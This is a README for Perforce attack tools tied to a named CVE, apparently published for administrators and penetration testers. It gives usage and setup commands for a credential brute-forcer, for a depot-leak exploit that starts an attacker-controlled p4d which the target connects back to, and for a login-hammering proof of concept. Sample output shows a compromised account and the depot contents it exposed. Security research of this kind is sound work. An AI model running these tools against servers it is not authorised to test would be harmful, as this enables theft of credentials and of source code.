
Perforce security research and tools - CVE-2026-6043
Perforce (Helix Core) security research tools and nuclei templates.
Research article: https://morganrobertson.net/p4wned/
Please read the above for complete details.
Authorised targets only. Use on your own servers or with explicit written permission.
Intended audience: Perforce server administrators, penetration testers, security engineers
May 2026 Update: Perforce 2026.1 has been released. This version ships with secure defaults! Very pleased to see this released to protect developer IP. Read more here.
Note: These tools scan for the misconfigurations resulting from CVE-2026-6043.
| Tool | Requires |
|---|---|
p4wned.py | Python 3, p4 CLI binary (see below) |
p4ghost.py | Python 3, p4 CLI binary, local p4d instance (see setup below) |
p4-auth-hammer | g++, Perforce C++ API, OpenSSL 1.1.1 (see p4-auth-hammer/README.md) |
| JavaScript tools | Node.js (no external dependencies) |
| Nuclei templates | Nuclei v3+ |
| Metasploit modules | Metasploit Framework |
Acquiring the p4 binary (required by p4wned.py and p4ghost.py):
# Subject to Perforce terms of use: https://www.perforce.com/legal
wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
chmod +x p4
Perforce servers expose a custom binary TCP protocol (default port 1666). Many installations ship with insecure defaults — unauthenticated user listing, server info disclosure, accessible remote depots, no password requirements, and no rate-limiting on login attempts. All tools here exploit these defaults without requiring credentials.
The primary scanner. Uses the p4 CLI binary to enumerate users, test credentials, list depots, and produce a report.
python3 p4wned.py [-brute] [-audit] [-parallel N]
Options:
| Flag | Description |
|---|---|
-brute | Enable brute force mode — tests passwords against all discovered user accounts |
-audit | Thorough audit mode — continues testing all users even after finding a vulnerability |
-parallel N | Number of parallel password attempts (default: 1) |
Config (edit at top of script):
| Variable | Description |
|---|---|
INPUT_FILE | Target list (ip:port, one per line) — default perforce-servers.txt |
P4_CMD | Path to p4 binary — default ./p4 |
TOP_PASSWORDS_FILE | Wordlist for brute force — default top-passwords.txt |
KNOWN_CREDS_FILE | Known credential pairs to try first |
REPORT_FILE | Output report path |
What it does:
run.users.authorize=0)super group membership on compromised accountsConsole output:
$ python3 p4wned.py
___ _ _ __ __ __ __ ___
/ _ \ || |/ / /\ \ \/\ \ \/__\/ \
/ /_)/ || |\ \/ \/ / \/ /_\ / /\ /
/ ___/|__ _\ /\ / /\ //__/ /_//
\/ |_| \/ \/\_\ \/\__/___,'
P4WNED - 0wning P4 servers via shit security defaults since Y2K+25
· Sniffs out user accounts, blank passwords, weak creds, and dumb settings.
· Confirms depots access and those juicy "super" user accounts.
· Drops a tidy report so you can fix the mess before the Skids arrive
Authorised targets only, brotendo. Use on your own servers or at your own risk.
==============================================================================
=== Processing: 192.0.2.10:1666 (perforce.example-studio.com) ===
[INFO] Testing user 'super' for security issues...
[INFO] User 'super' does not exist.
[INFO] Users listing accessible: build, designer1, jsmith, lead_prog, svc_build
[INFO] Testing user 'build' for security issues...
[INFO] Testing user 'designer1' for security issues...
[INFO] Testing user 'jsmith' for security issues...
[INFO] Testing user 'lead_prog' for security issues...
[INFO] Testing user 'svc_build' for security issues...
[INFO] Added new credential for 192.0.2.10:1666: user='svc_build', password='None'
[INFO] Saving updated credentials after finding valid credentials for svc_build on 192.0.2.10:1666
[INFO] Report saved to perforce-report-p4wned-1775436520.txt
Report file (perforce-report-p4wned-*.txt):
Perforce Security Scan Report
Server: 192.0.2.10:1666 (perforce.example-studio.com)
Status: Insecure
Note: Insecure via user 'svc_build' (no password)
== Depots ==
Depot depot 2025/11/03 local depot/... 'Default depot'
Depot assets 2024/08/19 local assets/... 'Asset depot'
== Last 10 Changes ==
Change 1047 on 2025/11/03 14:22:11 by lead_prog@DESKTOP-BUILD01
Merge branch feature/ai-pathfinding
Change 1046 on 2025/11/03 09:44:38 by designer1@DESKTOP-ART02
Updated character rig exports
== Depot Details ==
Depot: depot
-- Root Directories --
//depot/Source
//depot/Content
//depot/Config
This depot is a non-Unreal Engine Depot.
------------------------------------------------------------
Summary Report
Server: 192.0.2.10:1666 - Insecure - Note: Insecure via user 'svc_build' (no password)
Tests for unauthenticated remote depot access via the hidden remote user. The exploit works by running an attacker-controlled p4d instance locally — the target server connects back to it as part of the server-to-server protocol, leaking its depot file listing in the process.
Setup (one-time):
# Subject to Perforce terms of use: https://www.perforce.com/legal
wget https://ftp.perforce.com/perforce/r24.2/bin.linux26x86_64/p4d
wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
chmod +x p4d p4
# Start a plain ASCII p4d on port 1818 (used as the attacker's server)
mkdir p4root_attacker
./p4d -r ./p4root_attacker -p 1818 -d
# Start a unicode p4d on a separate port (1819) for unicode targets
mkdir p4root_attacker_unicode
./p4d -r ./p4root_attacker_unicode -xi # convert to unicode mode
./p4d -r ./p4root_attacker_unicode -p 1819 -d
python3 p4ghost.py <input_file> [-skipnolicense] [-report FILE] [-p4cmd PATH]
[-unicodeport PORT] [-nonunicodeport PORT] [-timeout SECS]
# Example invocation using the local attacker servers above
python3 p4ghost.py targets.txt -nonunicodeport 1818 -unicodeport 1819
Arguments:
| Flag | Description |
|---|---|
input_file | Target list (ip:port, one per line) |
-skipnolicense | Skip servers that return Server license: none |
-report FILE | Output report path |
-p4cmd PATH | Path to p4 binary (default ./p4) |
-unicodeport PORT | Local unicode p4d port to use as attacker's server |
-nonunicodeport PORT | Local non-unicode p4d port |
-timeout SECS | Command timeout |
Affected versions: All versions below 2025.1 with security < 4 (default is 0).
Proof-of-concept demonstrating that p4d does not effectively rate-limit authentication attempts when security < 3. Achieves >300,000 login attempts per minute against a single account using the Perforce C++ API.
./p4_auth_hammer_poc <server:port> <username> <password_file> [-ticketauth]
Build (requires Perforce C++ API and OpenSSL 1.1.1 — see p4-auth-hammer/README.md for full setup):